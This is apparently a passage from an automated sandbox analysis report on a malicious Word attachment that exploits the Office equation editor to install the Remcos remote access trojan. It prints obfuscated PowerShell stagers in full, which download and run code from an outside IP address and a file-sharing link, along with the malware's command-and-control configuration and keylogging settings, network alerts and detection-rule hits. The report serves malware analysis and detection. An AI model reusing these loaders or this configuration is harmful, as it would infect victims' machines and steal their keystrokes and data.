1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3180, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\getbestthingswithbestpicturewithgreatthingson.vbS" , ProcessId: 3068, ProcessName: wscript.exe
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3180, TargetFilename: C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3492, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))", CommandLine: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgI
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3492, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net.WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object { aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = [System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = [dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,zts
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3180, TargetFilename: C:\Users\user\AppData\Local\Temp\32orfxa5.xky.ps1

                  Data Obfuscation

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3180, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline", ProcessId: 2756, ProcessName: csc.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Registry Key setAuthor: Joe Security: Data: Details: 4E 55 2A 99 40 8F 37 80 24 62 FA EE 12 CB 64 B0 50 17 08 62 6D CB 9C A0 5A 19 81 E7 36 4F F1 85 EC 90 52 74 20 7A 8B 01 7C 2C A8 0C 66 3C 73 53 3E 9B E9 D9 DC AB 40 78 B6 92 F9 A9 CE 71 70 57 F8 B5 E1 8A E4 CC C9 00 42 0B FA 46 55 6B 7F 89 FB BA D2 6F 3F 79 82 94 A6 77 5C A9 39 A9 CC 0B 7A E9 E8 57 B2 4F 90 85 44 6A 5F 2B 8B 1E 9C D8 71 07 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 3608, TargetObject: HKEY_CURRENT_USER\Software\Rmc-N6HMP4\exepath
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-23T17:26:32.377165+020020241971A Network Trojan was detected85.215.206.8280192.168.2.2249169TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-23T17:26:32.377140+020020244491Attempted User Privilege Gain192.168.2.224916985.215.206.8280TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-23T17:27:17.066409+020020204231Exploit Kit Activity Detected85.215.206.8280192.168.2.2249173TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-23T17:27:17.066409+020020204251Exploit Kit Activity Detected85.215.206.8280192.168.2.2249173TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-23T17:27:21.729864+020020365941Malware Command and Control Activity Detected192.168.2.224917445.90.89.986498TCP
                  2024-10-23T17:27:23.249980+020020365941Malware Command and Control Activity Detected192.168.2.224917545.90.89.986498TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-23T17:27:02.450167+020020490381A Network Trojan was detected216.58.212.129443192.168.2.2249172TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-23T17:27:23.239085+020028033043Unknown Traffic192.168.2.2249176178.237.33.5080TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                  Source: 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["servemail.exprotedsteel.pro:6498:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-N6HMP4", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "wordse"}
                  Source: PO NAHK22012FA00000.docx.docReversingLabs: Detection: 13%
                  Source: Yara matchFile source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\wordse\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,20_2_004338C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,22_2_00404423
                  Source: powershell.exe, 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_f6e0fa35-6

                  Exploits

                  barindex
                  Source: Yara matchFile source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTR
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 85.215.206.82 Port: 80Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\mshta.exeJump to behavior
                  Source: ~WRF{DE8BB6AA-6431-42DF-A763-75296C786D33}.tmp.0.drStream path '_1791187939/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                  Privilege Escalation

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00407538 _wcslen,CoGetObject,20_2_00407538
                  Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49162 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49163 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49164 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.22:49171 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 216.58.212.129:443 -> 192.168.2.22:49172 version: TLS 1.0
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000013.00000002.514711440.0000000000250000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\Microsoft.Win32.TaskScheduler Rump\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdbSHA256 source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000013.00000002.522536524.00000000063A1000.00000004.00000800.00020000.00000000.sdmp
